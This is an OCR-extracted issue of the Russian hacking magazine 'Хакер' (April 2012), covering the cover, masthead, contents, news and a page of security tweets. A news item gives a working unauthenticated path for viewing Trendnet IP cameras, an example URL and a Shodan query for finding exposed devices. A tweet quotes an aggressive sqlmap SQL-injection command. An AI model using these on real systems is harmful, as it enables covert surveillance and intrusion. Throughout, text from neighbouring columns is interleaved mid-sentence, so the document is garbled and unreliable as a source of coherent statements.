АЛЬТЕРНАТИВНАЯ ПРОШИВКА ДЛЯ ANDROID 111

Ж У Р Н А Л О Т К О М П Ь Ю Т Е Р Н Ы Х Х У Л И ГА Н О В

DuckDuckGo:
WWW.XAKEP.RU
«Google следит
за тобой, мы — нет»
04 (159) 2012 СВОЙ АЛГОРИТМ ДЛЯ TRUECRYPT

РЕКОМЕНДОВАННАЯ
ЦЕНА: 230 р.

ОПАСНЫЙ
ДВОЙНИК ЛЕГКИЙ СПОСОБ ПОДДЕЛКИ
018

КОНТРОЛЬНОЙ СУММЫ И ЭЦП

С ПОМОЩЬЮ КОЛЛИЗИЙ

024

АЛЕКСАНДР
ГАЛИЦКИЙ:
ИНЖЕНЕР,
БИЗНЕСМЕН,
ИНВЕСТОР
084

SHIM ENGINE: НОВЫЙ

СПОСОБ ВНЕДРЕНИЯ КОДА
И АВТОЗАГРУЗКИ
056

ЭКСПЛУАТИРУЕМ СИСТЕМУ
ОТЛАДКИ И ТРАССИРОВКИ
ASP .NET
Intro
РЕДАКЦИЯ
Главный редактор Никита «nikitozz» Кислицин ([email protected])
Шеф-редактор Степан «step» Ильин ([email protected])
Выпускающий редактор Николай «gorl» Андреев ([email protected])

Редакторы рубрик
PC_ZONE и UNITS Степан «step» Ильин ([email protected])
ВЗЛОМ Петр Стаховски ([email protected])
UNIXOID и SYN/ACK Андрей «Andrushock» Матвеев ([email protected])
MALWARE Александр «Dr. Klouniz» Лозовский ([email protected])
КОДИНГ Николай «gorl» Андреев ([email protected])
PR-менеджер Людмила Вагизова ([email protected])
Литературный редактор Анна Аранчук

DVD
Выпускающий редактор Антон «ant» Жуков ([email protected])
Unix-раздел Андрей «Andrushock» Матвеев ([email protected])
Security-раздел Дмитрий «D1g1» Евдокимов ([email protected])
Монтаж видео Максим Трубицын

ART
Арт-директор Алик Вайнер ([email protected])
Дизайнер Егор Пономарев
Верстальщик Вера Светлых
Иллюстрация на обложке Алексей Ляпунов и Лена Эрлих

PUBLISHING
Учредитель ООО «Гейм Лэнд», 115280, Москва,
ул. Ленинская Слобода,19, Омега плаза, 5 этаж, офис № 21. Тел.: (495) 935-7034, факс: (495) 545-0906

Генеральный директор Дмитрий Агарунов

Генеральный издатель Андрей Михайлюк
Финансовый директор Андрей Фатеркин
Директор по маркетингу Елена Каркашадзе
Управляющий арт-директор Алик Вайнер
Главный дизайнер Энди Тернбулл
Директор по производству Сергей Кучерявый
ВООБРАЖЕНИЕ РАЗМЕЩЕНИЕ РЕКЛАМЫ
Тел.: (495) 935-7034, факс: (495) 545-0906
И РАМКИ РЕКЛАМНЫЙ ОТДЕЛ
Заместитель генерального Зинаида Чередниченко ([email protected])
директора по продажам
Директор группы TECHNOLOGY Марина Филатова ([email protected])
Все по-настоящему новое — это выход за общепринятые рамки Старшие менеджеры Ольга Емельянцева ([email protected])
представлений о том, что возможно, а что нет, что правильно, а что Светлана Мельникова ([email protected])
абсурдно. Сделать что-то новое, не встречая потока критики и со- Менеджеры Дмитрий Качурин ([email protected])
Елена Поликарпова ([email protected])
мнений — в принципе невозможно, так уж устроены люди. Умение
быть чуточку сумасшедшим и иногда делать вещи, которые кажут- Директор корпоративной группы (работа с рекламными агентствами)
ся окружающим сомнительными или даже абсурдными — большое Кристина Татаренкова ([email protected])
Старшие менеджеры Юлия Господинова ([email protected])
счастье! Ведь это снимает с тебя шоры и позволяет смотреть на Мария Дубровская ([email protected])
вещи шире, чем остальные люди. Старший трафик-менеджер Марья Буланова ([email protected])
В детстве у каждого человека все это есть: мы воспринимаем ОТДЕЛ РЕАЛИЗАЦИИ СПЕЦПРОЕКТОВ
мир с самого начала, живем и чувствуем все по-настоящему, без Директор Александр Коренфельд ([email protected])
искусственных границ. Но вот с годами мышление большинства Менеджеры Светлана Мюллер
Наталия Тулинова
людей сильно стереотипизируется и в определенный момент
разум перестает быть способным производить что-то новое и вы- РАСПРОСТРАНЕНИЕ
ходить за навязанные снаружи рамки. Даже шнурки завязать по- Директор по дистрибуции Татьяна Кошелева ([email protected])
Руководитель отдела подписки Виктория Клепикова ([email protected])
новому человек уже не может, не говоря уже о том, чтобы создать Руководитель
с нуля что-то. спецраспространения Наталья Лукичева ([email protected])
Пишу это к тому, что желаю и тебе и самому себе пронести по Претензии и дополнительная инфа:
жизни эту способность к созиданию, не стать долбаными зомби. В случае возникновения вопросов по качеству печати и DVD-дисков: [email protected].
И не обязательно для этого быть Сальвадором Дали — место для Горячая линия по подписке
Факс для отправки купонов и квитанций на новые подписки: (495) 545-09-06
творчества, дурачества и выдумывания есть абсолютно в любом Телефон отдела подписки для жителей Москвы: (495) 663-82-77
деле, чем бы ты ни занимался. Телефон для жителей регионов и для звонков с мобильных телефонов: 8-800-200-3-999
Для писем: 101000, Москва, Главпочтамт, а/я 652, Хакер

nikitozz, Зарегистрировано в Министерстве Российской Федерации по делам печати, телерадиовещанию

гл. ред. Х и средствам массовых коммуникаций ПИ Я 77-11802 от 14.02.2002.

Отпечатано в типографии Scanweb, Финляндия. Тираж 219 833 экземпляров.

P.S. Как и обещал, публикую фотографию Мнение редакции не обязательно совпадает с мнением авторов. Все материалы в номере
предоставляются как информация к размышлению. Лица, использующие данную информацию
логотипа Х на фоне станции «Восток» — это, на в противозаконных целях, могут быть привлечены к ответственности. Редакция не несет ответ-
минуточку, практически южный полюс. ственности за содержание рекламных объявлений в номере.За перепечатку наших материалов без
спроса — преследуем.
За фотку респект Сереге Сильнову!
По вопросам лицензирования и получения прав на использование редакционных материалов
журнала обращайтесь по адресу: [email protected].
© ООО «Гейм Лэнд», РФ, 2012
ХАКЕР 04/159/ 2012 001
Content 1100 МИНИАТЮРНЫХ РОБОТОВ
RECON SCOUT XT ПРИНЯТЫ НА
СЛУЖБУ АРМИИ США :)

008
HEADER
004 MEGANEWS 016 Колонка Степана Ильина
Все новое за последний месяц О быстром развертывании виртуальных машин
011 hacker tweets 017 Proof-of-concept
Хак-сцена в твиттере Идея: извлечь пароли пользователей Windows из памяти

COVERSTORY

024 Глаз-алмаз
Интервью с Александром
Галицким

COVERSTORY

018
Опасный двойник
Легкий способ
подделки кон-
трольной суммы
и ЭЦП с помощью
коллизий
056 116

PCZONE UNIXOID
030 Универ онлайн 102 Новые времена требуют перемен
Можно ли стать специалистом в IT, не выходя из дома? Да! Описание технологий ближайшего будущего,
036 Расшарить приложение! идущих на смену технологиям дня вчерашнего
Учимся переносить запущенные программы 106 Звенья одной цепи
с одного компьютера на другой Разбираемся с kobjects, sysfs, udev, udisks и upower
040 «Google следит за тобой. Мы — нет» 111 Битвы зеленых роботов
10 причин обратить внимание на поисковик DuckDuckGo.com Выбираем альтернативную Android-прошивку:
CyanogenMod vs MIUI

ВЗЛОМ
SYN/ACK
044 Easy-Hack
Хакерские секреты простых вещей 116 Новая эра терминальных систем
050 Обзор эксплоитов Разворачиваем инфраструктуру VDI на Win2k8R2 и Linux
Анализ свеженьких уязвимостей 122 Неизменно высокая доступность
056 ASP.NET: темная сторона трассировки Разворачиваем отказоустойчивый сервис хранения
Эксплуатируем систему регистрации и мониторинга данных на базе Samba
исключений ELMAH 128 Свежее дыхание
060 Взлом Mail.Ru Агента IT-решения от Microsoft: обзор главных новинок 2012 года
Получаем доступ к истории переписки и контактам
в популярном мессенджере
064 Будни халявщика FERRUM
Невыдуманная история о серьезных уязвимостях провайдера
068 Тибериумный реверсинг 134 Сетевой форсаж
Внедрение Х-кода и виртуальная машина: теория и практика Тестирование топовых роутеров
072 X-Tools 139 Просто конфетка!
Программы для взлома Обзор портативной акустической системы
Edifier MP15 Plus

MALWARE
ЮНИТЫ
074 С антивирусами покончено!
Последняя статья об устройстве аверов: мониторинг 140 FAQ UNITED
сетевой активности и песочницы Большой FAQ
080 Неизвестная угроза 143 Диско
Испытываем эвристику аверов на самых новых вирусах 8.5 Гб всякой всячины
144 WWW2
Удобные web-сервисы
КОДИНГ
084 Shim: новый метод инжекта
Использование Shim Engine для внедрения

088
кода и автозагрузки
True-криптование
134
Добавляем поддержку своих алгоритмов в TrueCrypt
092 Задачи на собеседованиях
Интересные задания, которые дают на собеседованиях
096 Паттерн «Шаблонный метод»
Инкапсуляция алгоритмов
100 WMI: обход защит
Неожиданный взгляд на привычные вещи
MEGANEWS
НА PASTEBIN ПОЯВИЛСЯ АНОНС ГРЯДУЩЕЙ
ОПЕРАЦИИ «ГЛОБАЛЬНЫЙ БЛЭКАУТ».
На 31 марта якобы запланирована
распределительная атака на 13 корневых
DNS-серверов.

УБИЙЦА ТЕЛЕВИДЕНИЯ ПРИСТАВКИ НА СЛУЖБЕ

СОЗДАТЕЛЬ ПРОТОКОЛА BITTORRENT ПРИДУМАЛ КОЕ-ЧТО НОВОЕ ПОЛИЦИИ
огда Брэм Коэн создавал протокол BitTorrent, желая сделать «что-то ПРАВООХРАНИТЕЛИ ТОЖЕ СТАРАЮТСЯ ИДТИ В НОГУ
К действительно полезное людям», он совсем не ожидал такого от-
клика и такого успеха. Пристальное и не всегда приятное внимание
С ПРОГРЕССОМ

к его персоне, неожиданные пожертвования, посыпавшиеся от благодарных лагодаря мно-

пользователей, и сумасшедшая популярность его детища едва не отвратили
Коэна от BitTorrent. Но, к счастью, он все же продолжил заниматься его под-
Б гочисленным
операциям
держкой и разработкой. хакеров, причисляю-
Недавно Брэм анонсировал новую версию протокола, получившую имя щих себя к Anonymous,
BitTorrent Live. На разработку Коэн потратил три года, и предназначается у специалистов и про-
новшество для организации видеотрансляций через пиринговые сети. Теперь стых пользователей
даже при многомиллионной аудитории задержка передачи видео не должна появилось немало
превышать и пяти секунд. BitTorrent Live позволяет снизить нагрузку на рас- «информации к раз-
пространителя файла до 99%. По словам Коэна, передача видео таким образом мышлению». Например,
будет стоить дешевле, чем по спутнику или с помощью CDN, и для нее не по- в конце прошлого года
требуется дорогостоящая инфраструктура. Бета-версия доступна по адресу в Сеть слили огромный
live.bittorrent.com, и автор уже заявляет, что BitTorrent Live убьет телевидение архив (pastebin.com/
в его текущем виде — должна кануть в лету физическая инфраструктура ТВ. NwN8ehFW) с пись-
Теперь Коэн находится в активном поиске партнеров, которые дадут согласие мами представителей
на распространение своего контента по предложенной им модели. Известно, правоохранительных
что разработкой уже заинтересовались в Netflix и Hulu. органов, в том числе —
данные с Gmail-аккаунта
Министерства юстиции киберпреступлений Калифорнии.
Эксперты Ars Technica основательно покопались в этом
Сам Брэм не слишком
одобряет весь
архиве и пришли к интересным выводам. Оказывает-
сегодняшний пират- ся, Xbox, PS3 и iPad сегодня стали одними из основных
ский бум и никогда средств поиска доказательств в судебных расследовани-
ничего не скачивал
нелегально. Он ях. Временные отметки в сохраненных играх, контрольные
хорошо понимает, — точки (чекпоинты) и даже скриншоты (например, такие,
MPAA, RIAA и прочие как делает Xbox Kinect), — все это является доказатель-
организации будут
только рады, если ством и может помочь в решении вопроса о виновности
он это сделает. «Ни подозреваемого.
в коем случае не хочу
давать им повод, они
Также участилось использование полицией онлай-
наверняка только новых сред (таких как Xbox Live) для общения с подо-
этого и ждут», — зреваемыми и ведения записи переговоров. Ars Technica
говорит Коэн, и,
вероятнее всего, он отмечает, что компания Microsoft вообще зарегистриро-
прав. вала «законный перехват», то есть систему, позволяющую
вести прослушку интернет-переговоров, в том числе
в Xbox Live или Skype.

ВЛАСТИ ИРАНА НАЧАЛИ В WINDOWS 8 НЕ БУДЕТ КНОП- В КАЗАХСТАНЕ ПРЕКРАТИ- В ANDROID MARKET FOXCONN ВЗЛОМАЛИ ХАКЕРЫ
ГЛУБОКУЮ ФИЛЬТРАЦИЮ КИ «ПУСК», хотя связанная ЛИ РАБОТУ ПРАКТИЧЕСКИ ПОЯВИЛСЯ АНТИВИРУС. ИЗ ГРУППЫ SWAGG SECURITY.
трафика на магистральных с ней функциональность все ВСЕ КРУПНЫЕ ТОРРЕНТ- Сервис Bouncer будет Данные о серверах, информа-
каналах связи, убивая все же сохранится в системе. ТРЕКЕРЫ, что связано автоматически сканировать цию о партнерах компании,
SSL-соединения. Протокол Также ОС обзавелась новым с вступившими в силу в конце все приложения на предмет логины и пароли, и даже
HTTPS не работает ни на лого. января изменениями в за- содержания вирусов и иных платежные документы Apple
одном сайте. конодательстве страны. вредоносных программ. выложили на TPB.

004 ХАКЕР 04 /159/ 2012

 01 02 03 04
ЕЖЕНЕДЕЛЬНИК ГЕРОИ И ЗЛОДЕИ [email protected] КАЖДУЮ НЕДЕЛЮ
В ЭЛЕКТРОННОМ АНГЛИЙСКОЙ ИЩЕМ АВТОРОВ. НАШ КОЛУМНИСТ
ФОРМАТЕ ВЫХОДИТ ПРЕМЬЕР-ЛИГИ ПРИСЫЛАЙТЕ О ФУТБОЛЬНОЙ
В СУББОТУ УТРОМ ПО ПОНЕДЕЛЬНИКАМ ИНФОРМАЦИЮ О СЕБЕ КУЛЬТУРЕ

Реклама
MEGANEWS СОЦИАЛЬНАЯ СЕТЬ «ВКОНТАКТЕ» окончательно перебралась на международный домен vk.com.

УЯЗВИМОСТЬ В УСТРОЙСТВАХ ДОБРО ПОЖАЛОВАТЬ

TRENDNET В ДОПОЛНЕННУЮ
ЧТОБЫ ПОСМОТРЕТЬ ВИДЕО, ДОСТАТОЧНО ЗНАТЬ ТОЛЬКО IP-АДРЕС РЕАЛЬНОСТЬ!
КАМЕРЫ
GOOGLE СОБИРАЕТСЯ ВЫПУСТИТЬ УСТРОЙСТВО
AUGMENTED REALITY

Сети давным-давно циркулируют слухи о том, что

В у корпорации Google есть секретные подразделе-
ния, где ведется разработка безумных гаджетов,
чуть ли не сборка Терминаторов. А недавно появились со-
общения, что сейчас в жилых домах сотрудников компании
проводится тестирование некоего «прототипа развлека-
тельного устройства», работающего в составе домашней
сети и способного подключаться к бытовой электронике
посредством Wi-Fi и Bluetooth. Возможно, речь о телевизи-
онной приставке от Google, а возможно — о панели управ-
ления умным домом. Доподлинно ничего не известно, ведь
информация просочилась в сеть случайно — из заявки на
Trendnet уже при-
знала, что с 2010 года разрешение означенного тестирования, которую Google по-
данная уязвимость дала в американскую Федеральную комиссию по коммуни-
действительно кациям. Большая часть таких сообщений, увы, так и остается
присутствует в 26
моделях ее ви- слухами, не получая ни подтверждений, ни опровержений.
деокамер, и недавно Но информация, появившаяся в Сети в этом месяце, носит
опубликовала новую
версию прошивки,
иной характер. Сначала вспомним о том, что еще в дека-
которая закрывает бре прошлого года начались первые разговоры о том, что
дырку. в Google работают над какими-то очками, которые в народе
тут же окрестили Google Glasses. Информация происходила
омпания Trendnet широко известна благодаря из солидного источника — издания New York Times, которое
К своим системам домашнего видеонаблюдения. Но
и у любого крупного вендора случаются оплош-
не замечено в распространении «желтухи». Подробностей
было мало: некое «носимое» устройство, вероятно, конку-
ности. Недавно в версии прошивки 1.1.0 (build 104) была рент будущего iPod nano. Появилось множество догадок
обнаружена уязвимость, позволяющая подключаться и домыслов, например о том, что Google обратила внимание
к системеTrendnet через интернет и смотреть видео на так называемый Heads-Up Display (HUD). Термин пришел
с любой IP-камеры: достаточно просто ввести ее IP-адрес из компьютерных игр и обозначает часть графического ин-
и добавить к нему путь из 15 символов, одинаковый для терфейса пользователя, служащую для отображения важ-
всех моделей. Никакого пароля не нужно. Для доступа ной информации во время игрового процесса. Разумеется,
к видеопотоку (даже если он запаролен), достаточно про- это наводило на мысли о дополненной реальности. Между
сто добавить в конце путь /anony/mjpg.cgi, и весь контент тем, сайт 9to5google.com узнал больше деталей и писал, что
прекрасно отображается. Например, введя такой адрес: по данным их источника разработка уже на стадии позднего
http://192.168.1.3/anony/mjpg.cgi, ты получишь беспа- прототипа. И вот прошло больше двух месяцев, пессимисты
рольный доступ к домашней системе видеонаблюдения, уже наверняка мысленно похоронили проект, но данные
которая установлена на IP-адресе 192.168.1.3. о загадочном девайсе появились снова, на сей раз более
Совсем не удивительно, что эта новость уже разлете- подробные. Итак, источник 9to5google.com сообщает:
лась по сети, на Pastebin выложили список более чем на «Прототип уже на поздней стадии разработки и выглядит
1 000 IP-адресов, немногим меньше собрали на Reddit. в точности как обыкновенные очки в тяжелой оправе. В них
IP-адреса систем видеонаблюдения также легко ищутся встроен дисплей с HUD-интерфейсом. На дужках есть не-
через shodanhq.com, который для этого и предназначен. сколько кнопок, и если бы не они, очки невозможно было бы
Достаточно ввести поисковый запрос [netcam]. отличить от обычных. Насколько нам известно, это не перифе-
рийное устройство для других Android-девайсов, как сообщал
NYT, — очки напрямую связываются с облаком. Однако они
ТОП ПЛОХИХ ХОСТИНГОВ СОСТАВИЛА КОМПАНИЯ GROUP-IB могут использовать Wi-Fi или Bluetooth 4.0. Область приме-
нения — дополненная реальность, которая будет привязана
к сервисам геолокации Google. Пользователь может гулять,
а на дисплее очков, в духе Терминатора, будет всплывать
информация об увиденных предметах. Очевидно, очки имеют
ПО РЕЗУЛЬТАТАМ встроенный GPS и, по-видимому, работают на Android».
Известно, что дисплей есть только для одного глаза, он
ИССЛЕДОВАНИЙ САМЫЙ непрозрачный и без 3D. Навигация по интерфейсу осущест-
вляется с помощью движений головы, она проста, и к ней,
ОПАСНЫЙ НА КОНЕЦ 2011 ГОДА пишет 9to5google.com, очень легко привыкнуть. Движения
головы будут практически незаметны для окружающих. Тех-
ХОСТ ЗАРЕГИСТРИРОВАН нические характеристики очков, вероятно, будут сопостави-
мы с Android-смартфоном. Ну и самое интересное: сообщает-
В ЛИТВЕ — ЭТО HOSTING MEDIA. ся, что Google может выпустить устройство довольно скоро.

006 ХАКЕР 04 /159/ 2012

MEGANEWS АПДЕЙТ УСТРАНИЛ 20 УЯЗВИМОСТЕЙ (включая одну критическую) в стабильной версии Google Chrome 17.0.963.46.

SYMANTEC УТВЕРЖДАЕТ, ЧТО РОБОТЫ

В КИТАЕ МОБИЛЬНАЯ ЭПИДЕМИЯ НА ВООРУЖЕНИИ
БОТНЕТ ИЗ ANDROID-УСТРОЙСТВ ЗАМЕЧЕН В ПОДНЕБЕСНОЙ АРМИИ США
ПЕНТАГОН ЗАКЛЮЧИЛ
КРУПНУЮ СДЕЛКУ

мериканские военные тоже любят гаджеты. Во-

А енное ведомство США заключило контакт с ком-
панией Recon Robotics, для которой это круп-
пециалисты компании Symantec обнаружили нейшая сделка за всю историю существования. Согласно
С малварь под названием RootSmart, которая
распространяется в альтернативных китайских
110-140 тыс.
активных устройств
в день — таков итог
договоренностям, до 31 мая текущего года армии США
будет поставлена партия из 1 100 миниатюрных роботов
каталогах программного обеспечения. В официальном анализа трафика на Recon Scout XT. Заказ оценивается ни много ни мало в 13.9
Android Market подобного, к счастью, обнаружено не C&C-серверах. Спе- миллионов долларов. Помимо роботов, военные заказали
циалисты считают,
было. RootSmart устанавливается вместе с обычным ПО что ботнет функцио- дополнительных аксессуаров для Recon Scout XT еще на
из каталога, но при этом передает на удаленный сервер нирует приблизи- миллион долларов.
номер IMEI, номер IMSI, ID соты, locationarea code и код тельно с сентября «Несмотря на малый размер, эти машины сыграют
2011 года.
мобильной сети. огромную роль в обеспечении наших бойцов актуальной
RootSmart — всего вторая программа после из- информацией о происходящем на поле боя», — заявил
вестного Ginger Master, которая на практике применила представитель Recon Robotics. Судя по тому, что не-
известный эксплойт Gingerbreak. Но, в отличие от пред- сколько месяцев назад военные уже закупили 315 таких
шественника, RootSmart не поставляется в комплекте роботов, в Пентагоне с этим абсолютно согласны.
с root-эксплойтом, а подгружает Gingerbreak с удален- Что представляют собой эти чудо-железяки? Recon
ного сервера уже после установки. Root-эксплойт идет Scout XT — это автономная видеокамера высокой
в архиве shells.zip в комплекте с двумя вспомогательными четкости в титановом корпусе, способная передавать
скриптами для установки в системную область. После качественную картинку на наладонник оператора. Проч-
рутования телефона программа подгружает с удаленного ная конструкция робота позволяет в буквальном смысле
сервера еще и Droid Live, которая уже исполняет роль забрасывать его на расстояние до 36 метров. Но больше
средства удаленного администрирования и выполняет всего поражает способность Recon Scout XT преодоле-
команды с сервера. Таким образом телефон становится вать вертикальные препятствия. Эта кроха может бодро
частью ботнета, и на порутанном телефоне хозяин бот- перемещаться и маневрировать на вертикальной стене
нета, по сути, может инициировать любые действия. По (youtu.be/5fzi7fxknIc)! Используя инфракрасный сенсор
оценкам специалистов, ботнет приносит своим хозяевам и бесшумный привод, Recon Scout XT может вплотную по-
от 1 600 до 9 000 долларов в сутки. добраться к «логову врага», не возбуждая подозрений.

WEXLER.BOOK T7007
ЭЛЕКТРОННАЯ КНИГА ПОД УПРАВЛЕНИЕМ ОС ANDROID 2.3

продажу поступила электронная Объем встроенной памяти составляет 8 ГБ, но

В книга WEXLER.BOOK T7007, рабо-
тающая на базе Android 2.3. Техни-
при желаниии его можно расширить до 32 ГБ с
помощью карт MicroSD. WEXLER.BOOK T7007
ческие характеристики новинки таковы: 7" также оснащается датчиком пространствен-
сенсорный LED-экран с функцией Multi-Touch, ного положения G-сенсор, и функцией под-
двухъядерный процессор ARM9, c частотой 1,2 ключения внешних USB-устройств (USB OTG).
ГГц и встроенный адаптер Wi-Fi (IEEE 802.11 Ридер выполнен в эргономичном металличе-
b/g/n) со скоростью доступа до 150 MБит/с. ском корпусе и поставляется в кожаном чехле.
Длительное время работы устройству обе- Ориентировочная розничная цена новинки
спечивает аккумулятор емкостью 3700 мАч. — 4999 руб.

008 ХАКЕР 04 /159/ 2012

MEGANEWS ПОДВЕДЕНЫ ИТОГИ ПЕРВОГО ГОДА РАБОТЫ ПРОГРАММЫ BUG BOUNTY: Google выплатила за баги более 410 тыс. долларов.

ВИРТУАЛЬНЫЕ РЕАЛИИ И ДРУГИЕ ИНТЕРЕСНЫЕ ВЕЩИ

О ЛЕКЦИИ ДЖЕРЕМИ БЕЙЛЕНСОНА И КРУТОМ ОБРАЗОВАТЕЛЬНОМ ПРОЕКТЕ

середине февраля жители Москвы (и не только они,

В но об этом поговорим ниже) могли присутствовать
на лекции Джереми Бейленсона — основателя
лаборатории Virtual Human Interaction Lab в Стэндфорд-
ском университете (vhil.stanford.edu). Будучи профессором
факультета коммуникаций, Бейленсон не только трудится
в одной из самых крутых лабораторий виртуальной реаль-
ности в мире, но и специализируется на когнитивной психо-
логии. Проще говоря, ему интересно, каким образом люди
могут осознавать себя, когда физические условности пере-
стают иметь значение. Лекция под названием «Бесконечная
реальность» прошла в рамках дистанционного образова-
тельного проекта Knowledge Stream (knowledgestream.ru).
Как ты понимаешь, ключевым словом здесь является «дис-
танционный». Все мероприятия можно совершенно бес-
платно посетить лично, приехав в «Цифровой октябрь», но
можно также посмотреть в прямом эфире или в архиве, ведь
их транслируют в интернет для десятков тысяч зрителей.
Синхронный перевод и HD-качество прилагаются. Джереми
Бейленсон начал свое выступление немного необычно
— вместо телемоста аудитории предложили посмотреть
вступительное видео. Посредством 20-минутной записи
Бейленсон объяснил, что не станет сегодня фокусироваться
на технологиях и методологии, так как всю информацию
о них можно найти в Сети, но расскажет о результатах ряда
экспериментов. Речь шла о цифровых аватарах в самом
широком смысле этого определения: практически о любой
цифровой репрезентации человеческой личности, будто до
голос, переданный по Skype, персонаж онлайновой игры или
воссозданная при помощи специального ПО точная вирту-
альная копия реального человека. На примерах Бейленсон
рассказывал, как человек воспринимает себя, в тех или
иных виртуальных условиях, в «телах» различных аватаров.
К примеру, пациент ожогового отделения во время пере- оставлять в сети так называемые «цифровые отпечатки» (то Дистанционный образователь-
вязки, разумеется, испытывает боль. Но исследования пока- есть практически любые следы) и, конечно, не обошлось без ный проект Knowledge Stream
был запущен осенью 2011 года
зали, что если на голову пациенту одеть шлем виртуальной обсуждения потенциального вреда, который может нанести Центром новых технологий
реальности, которыйперенесет его в холодный мир, где человеку излишнее погружение в виртуальность. и технологического предпри-
нимательства Digital October. Ге-
много снега, льда, потрясающей красоты кристаллов и так Стоит заметить, что другие лекции проекта Knowledge неральным партнером Knowledge
далее, ощущения боли снижаются едва ли не на 90%. Stream свободно доступны на сайте проекта и тоже стоят Stream выступает компания
По окончании видео Джереми уже лично присоединился ознакомления. К примеру, недавно лекцию читал Джон «Ростелеком», интеллектуаль-
ным партнером — «Российская
к беседе, немного дополнив изложенное в ролике. На- Перри Барлоу — основатель и вице-председатель Electronic венчурная компания».
ступила очередь традиционных вопросов из зала и беседы Frontier Foundation, эксперт по компьютерной безопасности,
с экспертами. Аудитория интересовалась, не аватар ли, а так же поэт и эссеист. Дискуссия о копирастах, авторских
часом, сам Бейленсон, что ждет нас в будущем, опасно ли правах и свободе информации вышла крайне интересной.

УЛЬТРАНОВОСТЬ ОТ «ЯВЫ ЗОЛОТОЙ»!

«Ява Золотая» представляет новую версию сигарет решений от «Явы Золотой» и выбери вкус, оптимально
с фильтром-мундштуком — «Ява Золотая Ультра подходящий именно тебе! «Ява Золотая Ультра Тур-
Турбо». бо» — это современный дизайн, традиционно высокое
Теперь сигареты «Ява Золотая» с фильтром- качество табака и популярный во всем мире фильтр!
мундштуком представлены в двух версиях — Турбо Новые сигареты обладают всеми качествами первой
и Ультра Турбо. Безупречное сочетание отборных версии — смелого решения 2011 года «Явы Золотой
сортов табака и мировых технологий позволили Турбо», при этом содержание смолы и никотина в
нам по-новому раскрыть уже знакомый турбовкус! дыме сигареты существенно ниже: смолы — 4 мг,
Почувствуй преимущество смелых технологичных никотина — 0,4 мг, CO — 5 мг.

010 ХАКЕР 04 /159/ 2012

Реклама
#hacker tweets
@n00bznet: @FirefoxNightly: @RomiSphinX:
./sqlmap.py -u http://url/ --crawl=5 ASLR теперь обязателен «Физика — как секс: конечно,
--level=5 --risk=3 --threads=10 <~ для всех dll-модулей в пла- может дать некоторые практи-
Ты может быть и нуб, но ты нуб гинах (для Винды) так как ческие результаты, но не из-за
с базой данных! не-ASLR модули могут разрушить всю этого мы ей занимаемся.» (с) Доктор Ричард
безопасность http://t.co/IQFdZrZ4 Фейнман <3
Комментарий:
Шутки шутками, но sqlmap — дей- Комментарий: Комментарий:
ствительно крутая тулза для эксплуатаций Хороший ход для Firefox, но... Ричард Филлипс Фейнман (англ.
SQLi-дырок. Richard Phillips Feynman; 11 мая 1918 — 15
февраля 1988) — выдающийся амери-
@pa_kt: канский ученый. Основные достижения
@ChrisJohnRiley: относятся к области теоретической физики.
Эксплуатация CVE-2011-2371
Я предлагаю заменить выра- Один из создателей квантовой электроди-
(Firefox reduceRight) без исполь-
жение «как отнять конфетку намики. В 1943—1945 годах входил в число
зования не-ASLR модулей:
у ребенка» на «как обойти разработчиков атомной бомбы в Лос-
http://t.co/3uNU3Jjj
антивирус»… По сути — одно и то же :) Аламосе.
Комментарий:
Комментарий: ...но этого не достаточно!
Обхождение антивируса, чаще всего, Увлекательное чтиво про эксплуатацию
не самая сложная задача при пентесте, тут @mathias:
дыры в Firefox с обходом DEP и ASLR.
Крис прав... Валидный JavaScript: try { x; }
Причем ASLR обходится не через ROP
catch( _ _ ) { console.
в не-ASLR модулях, а через утечку базового
log('CODE, Y U NO WORK '); }
адреса dll и уже последующего построения
http://t.co/RTJaNUij
@corelanc0d3r: ROP-программы для полученной dll’ки.
Один из моих фаззеров упал Комментарий:
с крешем, — плохо, что не экс- Забавное мини-исследование на тему
плуатируемо :) @FreedomCoder: наименований переменных в JavaScript.
Не эксплойты ломают код. Может быть годным для обхода фильтров,
Разработчики ломают код... например :)
@geovedi:
Нерды — просто люди, которые
горят чем-то достаточно, чтобы @daveaitel:
тяжело над этим работать. @joshcorman: WP ftw! Удаленный доступ
Подсказка: название White с правами SYSTEM для наиболее
Paper не поднимает ваш текст популярной (в области продаж)
магическо-автоматическим системы удаленного администрирования?
@clarkysj:
способом на уровень «Суперлидерского- Без аутентификации! Symantec pcAnywhere
Дорогой Гугль, я успешно полу- 12.5 выполнение произвольного кода.
исследования-в-области-ИБ».
чил 5 уведомлений, 18 е-майлов
и 6 поп-апов о том, что ты
меняешь политику конфиденциальности.
@i0n1c:
Пожалуйста, пошли мне еще. @f1nux:
Пожалуйста, почему... Ну почему Я потерял 80 фолловеров с тех
же мы до сих пор плачем каж- пор как объявил, что, возможно,
дый раз, когда происходят кося- один из них ответственен за
@thealuc: взлом экс-министра обороны.
ки с SSL. Ведь он и так умер несколько лет
Это неплохая идея, делать жур-
назад. Настало время тихой скорби...
налирование истории консоли
на твоем веб-сервере: >(tee
-a ~/.bash_history | logger -t «$USER[$$] Комментарий: @evacide:
И действительно, SSL вымирает, но Визуальный язык интернет-
$SSH_CONNECTION»)
мы еще держимся за него. Но и уязвимости, конфиденциальности в основном
и провалы доверенных корневых центров, — о защите маленьких девочек-
все это лишь подрывает доверие. блондиночек.

ХАКЕР 04 /159/ 2012 011

 ИНДИЙСКИЙ MICROSOFT STORE ВЗЛОМАЛИ ХАКЕРЫ ИЗ EVIL SHADOW TEAM. Дело не ограничи-
MEGANEWS лось дефейсом, парни также выложили скриншоты с файлами БД магазина.

НАСВИСТИ МНЕ ССЫЛКУ ANONYMOUS СЛУШАЕТ

ЗВУКОВОЙ АНАЛОГ QR-КОДОВ ГОТОВ К РАБОТЕ ОТ ВЕЗДЕСУЩИХ ХАКЕРОВ НЕ МОГУТ
УКРЫТЬСЯ ДАЖЕ ФБР И ПОЛИЦИЯ
Бесплатное при-
ложение Sonic сли бы нам вздумалось писать обо всех деяниях
Experiences, которое
предоставляет до-
ступ ко всем описан-
Е хактивистов Anonymous, то, наверное, пришлось
бы учредить отдельное дополнение к журналу.
ным функциям, уже Однако некоторые проделки хакеров «бесчисленного ле-
вышло и доступно
в версиях для iPhone гиона» все же достойны упоминания. Например, в прошлом
и Android. месяце из-за них здорово опозорились ФБР и полиция
Скотланд-Ярда. По сообщению Би-Би-Си, в январе текуще-
го года хакеры каким-то образом подслушали телефонный
разговор между экспертами ФБР и полиции! В ходе беседы
сотрудники органов как раз делились информацией о са-
мих Anonymous и обсуждали планы ареста членов группы,
включая даты и имеющиеся доказательства. Хакеры вы-
